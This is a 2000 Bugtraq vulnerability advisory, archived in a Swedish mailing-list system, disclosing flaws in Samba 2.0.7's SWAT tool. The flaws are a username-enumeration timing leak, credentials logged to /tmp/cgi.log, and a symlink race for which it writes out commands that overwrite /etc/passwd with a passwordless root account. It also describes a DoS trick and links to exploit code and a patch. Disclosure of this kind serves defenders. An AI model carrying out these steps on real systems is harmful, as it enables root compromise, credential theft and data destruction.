linux, säkerhet

5659539 2000-10-30 09:27 -0800  /109 rader/ Optyx - Uberhax0r Communications <optyx@UBERHAX0R.NET>
Sänt av: joel@lysator.liu.se
Importerad: 2000-10-31  01:05  av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: optyx@UBERHAX0R.NET
Mottagare: Bugtraq (import) <13512>
Extra kopia: Samba -- fri implementation av SMB <808>
    Sänt:     2000-10-31 01:09
    Sänt av Mathias Hansson (food for thoughtlessness)
Ärende: Samba 2.0.7 SWAT vulnerabilities
------------------------------------------------------------
From: Optyx - Uberhax0r Communications <optyx@UBERHAX0R.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.SOL.4.21.0010300920500.3477-100000@d33r>

******************************************************************************
the original writeup can be found at
http://www.uberhax0r.net/~miah/swat along with all the code mentioned
in this advisory
******************************************************************************

The program swat included in the samba distribution allows username
and password bruteforcing. An attacker can easily generate userlists
and then bruteforce their passwords. Comments in the source code show
that somebody tried to prevent this from happening[1].

The problem occurs when a user types in the wrong password. If swat
gets a valid username, but incorrect password it errors with:

2second pause

401 Authorization Required

You must be authenticated to use this service.

If swat gets a invalid username / password:

NO PAUSE

401 Bad Authorization

username/password must be supplied

The following code is written by t12. It will generate a list of
valid usernames and then brute force passwords for those
usernames. It has been tested on freebsd.

http://www.uberhax0r.net/~miah/swat/code/flyswatter.c

Obviously, if the username/password are correct you get logged in.

What makes this even worse is that swat does no logging. However; if
logging[2] is enabled a temp race exists. Swat does not check for
file existence before hand and it overwrites the file without
regret. What makes this even worse is swat will log *any* input it
gets into this log file. So for example we have local shell on a
system running swat but want root we simply:

ln -s /tmp/cgi.log /etc/passwd

telnet localhost 901
--enter the following--
rootuser::0:0::/:/bin/bash
--hang up the connection--

We now have the following entry in our /etc/passwd file: [Date: Mon,
23 Oct 2000 16:03:13 GMT localhost.localdomain (127.0.0.1)]
rootuser::0:0::/:/bin/bash

You could also use this shell script
http://www.uberhax0r.net/~miah/swat/code/swat-exp.sh or if you want
it in C http://www.uberhax0r.net/~miah/swat/code/swat-exp.c also
precompiled for linux
http://www.uberhax0r.net/~miah/swat/code/swat-exp.linux (code by
optyx)

You can also download a fixed cgi.c
http://www.uberhax0r.net/~miah/swat/code/cgi.c.fixed (make your own
damned diff) (fix by optyx)

You can now su to that user. *NOTE* this will destroy the passwd
file. Now you might be thinking "but if the /tmp/cgi.log exists, how
can a user overwrite it with a symlink?". The answer: Why bother! The
cgi.log file contains everything the users webbrowser sent back to it
including their login/password.

The Authorization: Basic entries have username:password encoded in
base64 in them. Most of the time the swat administrator will login as
root to do the changes to the smb.conf, so getting root is easy. You
can run the gimme-login.sh script to get a list of logins from the
cgi.log.

Swat is also vulnerable to a DoS attack. Anybody can perform
this. Simply login to swat with a improper username and password, but
change the default url from "hostname:901" to somthing like
"hostname:901?somerandomfile". Swat will error with "Authentication
Required"(even with valid accounts) and inetd will restart it. Using
netscape, netscape will retry to get the file and will eventually
cause the inetd daemon to shutdown swat for 10 minutes (dependent on
inetd configuration, this is tested on linux redhat 6.2)

[1] In the cgi.c file the following entry exists:
Line 349/367
/*
* Always give the same error so a cracker
* cannot tell why we fail.
*/

The person that wrote this code obviously didn't check their work to
well.

[2] Logging is enabled by changing samba-2.0.7/source/web/cgi.c's
"#define CGI_LOGGING 0" to "#define CGI_LOGGING 1". Some systems may
have this by default, otherwise its a tweak the sysadmin will most
likely have to do.

credit to miah for discovering everything and t12 and optyx for the
code.

*****************************************************************************
Uberhax0r Communications, putting bullets in mullets since '96
(5659539) --------------------------------(Ombruten)